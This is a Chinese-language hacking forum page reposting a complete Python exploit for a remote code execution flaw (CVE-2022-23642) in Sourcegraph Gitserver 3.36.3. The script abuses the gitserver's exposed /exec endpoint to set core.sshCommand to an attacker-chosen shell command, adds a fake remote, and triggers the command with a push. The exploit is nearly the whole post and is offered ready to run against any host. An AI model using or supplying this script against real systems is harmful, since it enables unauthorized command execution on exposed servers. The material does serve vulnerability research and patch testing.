跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)

404 Not Found
404 Not Found
WEB和服务器安全漏洞

精选回复

发布于 
# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
# Date: 2022-06-10
# Exploit Author: Altelus
# Vendor Homepage: https://about.sourcegraph.com/
# Version: 3.63.3 
# Tested on: Linux
# CVE : CVE-2022-23642
# Docker Container: sourcegraph/server:3.36.3

# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. 
# This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed 
# on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible 
# if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3
#
# Exploitation parameters:
# - Exposed Sourcegraph gitserver
# - Existing repo on sourcegraph



import json
import argparse
import requests

def exploit(host, existing_git, cmd):

    # setting sshCommand
    data = {
        "Repo" : existing_git,
        "Args" : [
            "config",
            "core.sshCommand",
            cmd
        ]
    }

    res = requests.get(host+"/exec", json=data).text

    if len(res) > 0:
        print("[-] Didn't work: {}".format(res))
        exit(0)

    # setting fake origin
    data = {
        "Repo" : existing_git,
        "Args" : [
            "remote",
            "add",
            "origin",
            "git@lolololz:foo/bar.git"
        ]
    }

    res = requests.get(host+"/exec", json=data).text

    if len(res) > 0:
        print("[-] Didn't work: {}".format(res))
        exit(0)

    # triggering command using push
    data = {
        "Repo" : existing_git,
        "Args" : [
            "push",
            "origin",
            "master"
        ]
    }

    res = requests.get(host+"/exec", json=data).text

    print("[*] Finished executing exploit")

parser = argparse.ArgumentParser()

parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")
parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")
parser.add_argument('--cmd', required=True, help="Command to run")
args = parser.parse_args()

host = args.gitserver_host
existing_git = args.existing_git
cmd = args.cmd


exploit(host, existing_git, cmd)

 

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。